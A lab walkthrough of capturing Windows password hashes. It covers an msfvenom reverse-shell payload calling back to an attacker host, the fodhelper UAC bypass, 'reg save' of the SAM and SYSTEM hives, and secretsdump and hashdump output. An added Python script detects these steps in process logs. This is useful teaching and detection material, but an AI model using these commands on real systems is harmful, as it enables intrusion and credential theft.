# Obtaining hashes on modern systems

To begin, let's set up a lab suited to trying out the hash-capture methods. In this scenario we do not have privileged access on the system.

```
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.134 lport=443 -f exe > arq.exe
```

```
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <lhost>
set LPORT <lport>
exploit
```

We can try running **hashdump**, but since we do not have privileged access it will not succeed.

```
meterpreter > hashdump 
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
```

Let's try an administrative action, for example saving the SAM straight from the registry (hklm = HKEY_LOCAL_MACHINE).

```
C:\>reg save hklm\sam arqSam
ERROR: Access is denied.
```

Access is denied, so we need to escalate to administrative privilege for this to be possible.

So let's look for modules to bypass UAC (User Account Control). To do that we **background** the session instead of killing it.

```
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         meterpreter x64/windows  DESKTOP-MJHCOMS\trzwo @ DESKTOP-MJHCOMS  192.168.2.134:666 -> 192.168.2.137:61248 (192.168.2.137)

msf6 exploit(multi/handler) > search uac
```

```
msf6 exploit(windows/local/ask) > use exploit/windows/local/bypassuac_fodhelper
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_fodhelper) > show options 

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.134    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf6 exploit(windows/local/bypassuac_fodhelper) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/bypassuac_fodhelper) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64


msf6 exploit(windows/local/bypassuac_fodhelper) > set target 1
target => 1
msf6 exploit(windows/local/bypassuac_fodhelper) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_fodhelper) > exploit
```

With that we bypass UAC and can grab the files.

```
meterpreter > shell
Process 2424 created.
Channel 1 created.
Microsoft Windows [versão 10.0.19043.1083]
(c) Microsoft Corporation. Todos os direitos reservados.

C:\Windows\system32>cd \
cd \

C:\>reg save hklm\sam sam1
reg save hklm\sam sam1
A operação foi concluída com êxito.
```
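The two steps shown above, the fodhelper UAC bypass and the `reg save` of a protected hive, are also exactly what a defender should alert on. The Python script below is an added example, not part of the original page: it runs two detection rules over a few constructed process-creation records whose field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage, IntegrityLevel, User). The records, paths and file names are made up for the demonstration and reuse the page's host and user names; `detect_events` and the rule names are this example's own.

```python
import re

# Pattern for an export of one of the three local-secret hives via reg.exe.
# Matches "reg save hklm\sam ..." as on the page, and also reg.exe with a
# full quoted path, HKEY_LOCAL_MACHINE spelled out, and any letter case.
HIVE_EXPORT = re.compile(
    r"\breg(?:\.exe)?[\"']?\s+save\s+[\"']?(?:hklm|hkey_local_machine)\\(sam|system|security)\b",
    re.IGNORECASE,
)

# fodhelper.exe is an auto-elevating Windows binary; it has no business
# spawning a command interpreter, so that parent/child pair is a strong signal.
AUTO_ELEVATING_PARENTS = {"fodhelper.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ("" if the path is empty)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_events(events):
    """Return (rule, user, detail) tuples for every suspicious record."""
    alerts = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmdline = ev.get("CommandLine", "")
        user = ev.get("User", "?")

        # Rule 1: reg.exe exporting SAM, SYSTEM or SECURITY (needs admin rights).
        m = HIVE_EXPORT.search(cmdline)
        if m:
            alerts.append(("hive_export", user, f"{m.group(1).upper()} hive: {cmdline}"))

        # Rule 2: an auto-elevating binary spawning a shell (UAC bypass pattern).
        if parent in AUTO_ELEVATING_PARENTS and image in INTERPRETERS:
            level = ev.get("IntegrityLevel", "?")
            alerts.append(("uac_bypass_child", user, f"{parent} spawned {image} at {level} integrity"))
    return alerts


# Constructed sample records (not real telemetry); only the host and user
# names are taken from the page.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium",
     "User": r"DESKTOP-MJHCOMS\trzwo"},                                   # benign
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe", "IntegrityLevel": "High",
     "User": r"DESKTOP-MJHCOMS\trzwo"},                                   # rule 2
    {"Image": r"C:\Windows\System32\reg.exe", "CommandLine": r"reg save hklm\sam sam1",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "High",
     "User": r"DESKTOP-MJHCOMS\trzwo"},                                   # rule 1
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "Medium",
     "User": r"DESKTOP-MJHCOMS\trzwo"},                                   # benign
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'"C:\Windows\System32\reg.exe" save "HKEY_LOCAL_MACHINE\SYSTEM" system1',
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "High",
     "User": r"DESKTOP-MJHCOMS\trzwo"},                                   # rule 1
]

if __name__ == "__main__":
    for rule, user, detail in detect_events(SAMPLE_EVENTS):
        print(f"[{rule}] {user}: {detail}")
```

Running it prints one `uac_bypass_child` alert and two `hive_export` alerts; the benign `explorer.exe` child and the `reg query` stay silent. In practice the same two rules map directly onto Sysmon or EDR process-creation telemetry, with the hive-export rule also worth applying to the `ParentCommandLine` field.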

With the two files, SAM and SYSTEM (the SYSTEM hive, saved the same way as system1, holds the boot key secretsdump needs to decrypt the SAM), we get the hashes using impacket-secretsdump.

```
┌──(user㉿kali)-[~/Desktop]
└─$ impacket-secretsdump -sam sam1 -system system1 LOCAL                                                       130 ⨯
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xd34a2958235bcb73bb29ba99ea85df58
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:91831139e883c482ff011cf6801468dc:::
trzwo:1001:aad3b435b51404eeaad3b435b51404ee:4469eae41ee734606dc5321bae42c5f3:::
[*] Cleaning up... 
```

The same result comes out if we use meterpreter's hashdump.

```
meterpreter > hashdump 
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
trzwo:1001:aad3b435b51404eeaad3b435b51404ee:4469eae41ee734606dc5321bae42c5f3:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:91831139e883c482ff011cf6801468dc:::
```
